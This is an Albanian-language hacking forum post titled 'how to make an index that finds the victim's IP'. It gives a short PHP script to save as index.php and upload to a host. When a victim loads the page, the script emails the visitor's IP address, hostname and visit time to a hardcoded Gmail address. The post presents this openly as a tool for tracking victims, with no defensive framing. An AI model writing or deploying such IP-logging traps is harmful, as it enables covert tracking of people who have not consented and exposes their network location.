Miresevini ne forum ju urojm te kaloni çaste te bukura dhe kenaqesi pa fund...

Powered By:Valmir Shala
 
ForumForum  PortalPortal  KërkoKërko  RegjistrohuRegjistrohu  identifikimi  

Share
 

 Si Te Hapim Nje Index qe ta gjen IP e Viktimes

Shko poshtë 
AutoriMesazh
noah~hack
Admin
noah~hack

Numri i postimeve : 275
Join date : 24/01/2010
Age : 26

Si Te Hapim Nje Index qe ta gjen IP e Viktimes Empty
MesazhTitulli: Si Te Hapim Nje Index qe ta gjen IP e Viktimes   Si Te Hapim Nje Index qe ta gjen IP e Viktimes EmptyFri Jan 29, 2010 9:55 pm

Si Te Hapim Nje Index qe ta gjen IP e Viktimes

Fillojm....

Hapim Notepad

ose

shkojm Start - Run - NOTEPAD.EXE

edhe ja qesim kete kod


Kodi:

<?
$ip = $REMOTE_ADDR;
$host =

gethostbyaddr($ip);
$date = date("d/m/Y H:i:s");
$email = "ast.crew@gmail.com";
$sujet = "Ip + Host";
$message =

"Moment : $date
Ip : $ip
Host : $host";
if(mail($email,$sujet,$message,"Content-Type: text/html")){
echo

"Ownneeed";}
else { echo "Shit ?";}

e ruejm Save AS ....Index.php

e uploadoni ne host

Mandej

shkojm ne hostin ku e keni uploadu psh. http://www.hosti.com/index.php
Si Te Hapim Nje Index qe ta gjen IP e Viktimes Valmir11
Mbrapsht në krye Shko poshtë
http://www.v-shala.tk
 
Si Te Hapim Nje Index qe ta gjen IP e Viktimes
Mbrapsht në krye 
Faqja 1 e 1
 Similar topics
-
» Prime gear drop locations
» BrainFish w Cerebellum Book

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
Miresevini ne forum ju urojm te kaloni çaste te bukura dhe kenaqesi pa fund...  :: Tutoriale&Mesime :: Hacking Tools-
Kërce tek: